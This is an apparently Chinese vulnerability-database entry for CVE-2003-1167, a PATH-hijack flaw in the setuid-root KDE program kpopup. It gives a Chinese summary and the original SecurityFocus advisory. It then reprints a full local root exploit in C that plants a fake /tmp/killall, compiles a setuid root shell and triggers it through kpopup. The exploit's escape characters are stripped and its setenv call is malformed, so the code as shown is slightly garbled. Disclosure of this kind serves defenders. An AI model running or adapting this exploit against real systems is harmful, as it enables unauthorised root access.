kpopup不安全系统调用任意命令执行漏洞

kpopup不安全系统调用任意命令执行漏洞

漏洞ID 1107551 漏洞类型 其他
发布时间 2003-10-28 更新时间 2005-10-20
图片[1]-kpopup不安全系统调用任意命令执行漏洞-安全小百科CVE编号 CVE-2003-1167
图片[2]-kpopup不安全系统调用任意命令执行漏洞-安全小百科CNNVD-ID CNNVD-200312-362
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/23308
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-362
|漏洞详情
Kpopup是一款KDE程序,用于发送和接收MSWindowsWinPopup消息的程序。Kpopup程序使用不安全的system(3)调用外部工具,本地攻击者可以利用这个漏洞以root用户权限在系统上执行任意命令。Kpopup程序依靠PATH环境变量不安全的使用system()函数来调用killall(1)程序,当执行Kpopup时如果设置环境变量,就可能导致恶意的伪造的killall(1)程序执行。许多目前的SHELL会阻止通过setuid/setgid进程使用这些函数,而且如果进程不匹配进程的实际userid/gid就会丢弃权限。kpopup可能是在调用system前首先设置实际uid和gid为0而导致了安全问题。
|漏洞EXP
source: http://www.securityfocus.com/bid/8915/info

It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is is installed setuid root by default. According to the report, kpopup uses the system(3) C-library function insecurely to run other utilities on the system. In at least one instance, system(3) is called to invoke the binary killall(1) in a manner relying on the PATH environment variable. As the environment can be set by the unprivileged user when kpopup is executed, an arbitrary executable with the filename killall(1) can be executed. Many modern shells anticipate insecure use of this function by setuid/setgid processes and drop effective privileges if they do not match the real userid/gid of the process. It may be the case that kpopup first sets its real uid and gid to 0 before calling system, making this vulnerability exploitable. This has not been confirmed by Symantec. 

/*Local root exploit for kpopup
 *by b0f www.b0f.net
 */
#include <stdio.h>
int main()
{
setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:
/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
FILE *fd;
fd = fopen("/tmp/killall", "w");{
fprintf(fd, "#!/bin/shn");
fprintf(fd, "cd /tmpn");
fprintf(fd, "/bin/cat > shell.c << EOFn");
fprintf(fd, "#include <stdio.h>n");
fprintf(fd, "int main()n");
fprintf(fd, "{n");
fprintf(fd, "setuid(0);n");
fprintf(fd, "setgid(0);n");
fprintf(fd, "execl("/bin/bash", "-bash", NULL);n");
fprintf(fd, "return 0;n");
fprintf(fd, "}n");
fprintf(fd, "EOFn");
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shelln");
fprintf(fd, "/bin/chown root.root /tmp/shelln");
fprintf(fd, "/bin/chmod 6711 /tmp/shelln");
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELLn");
fprintf(fd, "/tmp/shelln");
fclose(fd);
system("chmod +x /tmp/killall");
system("/usr/local/kde/bin/kpopup root shell");
return 0;
}
}
|参考资料

来源:BID
名称:8915
链接:http://www.securityfocus.com/bid/8915
来源:OSVDB
名称:2742
链接:http://www.osvdb.org/2742
来源:SECUNIA
名称:10105
链接:http://secunia.com/advisories/10105
来源:XF
名称:kpopup-systemcall-execute-code(13540)
链接:http://xforce.iss.net/xforce/xfdb/13540
来源:BUGTRAQ
名称:20031028Localrootvulninkpopup
链接:http://www.securityfocus.com/archive/1/342736
来源:NSFOCUS
名称:5600
链接:http://www.nsfocus.net/vulndb/5600

相关推荐: Microsoft IIS 5.0 Denial Of Service Vulnerability

Microsoft IIS 5.0 Denial Of Service Vulnerability 漏洞ID 1102054 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002-05-27 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享